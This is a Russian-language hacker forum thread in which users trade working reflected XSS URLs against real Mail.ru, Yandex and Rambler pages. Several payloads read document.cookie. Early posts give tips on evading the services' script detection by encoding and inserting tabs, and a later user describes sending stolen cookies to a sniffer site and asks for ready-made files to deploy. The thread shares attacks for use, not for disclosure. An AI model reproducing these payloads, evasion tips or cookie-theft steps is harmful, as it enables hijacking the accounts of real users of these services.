XSS mail.ru rambler.ru

Discussion in 'Уязвимости Mail-сервисов' started by slider, 4 Dec 2006.

  1. abashkin

    abashkin Banned

    Joined:
    9 Jul 2006
    Messages:
    0
    Likes Received:
    0
    Reputations:
    -7
    Я думаю нужно как то обходить этого стукача-отлавливателя.....иначе неодна xss непродержится долгл..даже если одни запрос или отчёт пришёл что на такой то такой то странице был замечен <script></script> то всё уже...
     
  2. m17

    m17 New Member

    Joined:
    5 Dec 2006
    Messages:
    21
    Likes Received:
    1
    Reputations:
    2
    ни в коем случае не отправлять открытым текстом, закодировать ессесена, табуляций навтыкать, проблема только в том что написание скрипта который избавиться от всего этого мусора не составляет труда, и поэтому если уж они таким образом что-то отлавливают, то должно быть это сделано положенным образом...
     
  3. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Постараюсь как можно короче!....
    Кто знает тот поймёт! ;)

    http://top.mail.ru/stat/index.php?url="><script>alert(document.cookie)</script>
     
    1 person likes this.
  4. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    XSS на Яндексе, можеет кому-нибудь пригодиться...:

    Code:
    http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E

    И еше на Рамблере:
    Code:
    http://vision.rambler.ru/actions/piece.html?album=1%22%3E%3Cscript%3Ealert()%3C/script%3E
     
  5. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Ток что нашол :)http://foto.rambler.ru/topics/7316410/date/?p=15"><script>alert(document.cookie)</script>
     
    2 people like this.
  6. 4nob1oz

    4nob1oz Elder - Старейшина

    Joined:
    9 Jul 2007
    Messages:
    30
    Likes Received:
    22
    Reputations:
    0
    http://icq.rambler.ru/srch?words=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
     
    1 person likes this.
  7. Campers

    Campers New Member

    Joined:
    25 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    у меня беда. все сделал правильно. тестировал работает или нет, все нормально пришло на снифер http://na-s.ru и все после этого уже больше не сливало нечего на снифер, пишет база пуста и все, как исправить?? мб из-за браузера??
     
  8. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    смари как ево обычный куки стойт и через него смари!
     
  9. Campers

    Campers New Member

    Joined:
    25 Nov 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    НЕ а почему первый раз получилось и все больше не проходит?? Залейте плз уже готовые файлы, которые надо добавлять на сайт. мб я чето не так делаю
     
  10. P3L3NG

    P3L3NG Banned

    Joined:
    4 Jun 2008
    Messages:
    175
    Likes Received:
    204
    Reputations:
    11
    пришло? :confused: 2 года уже прошло. оч сомневаюсь
     
    1 person likes this.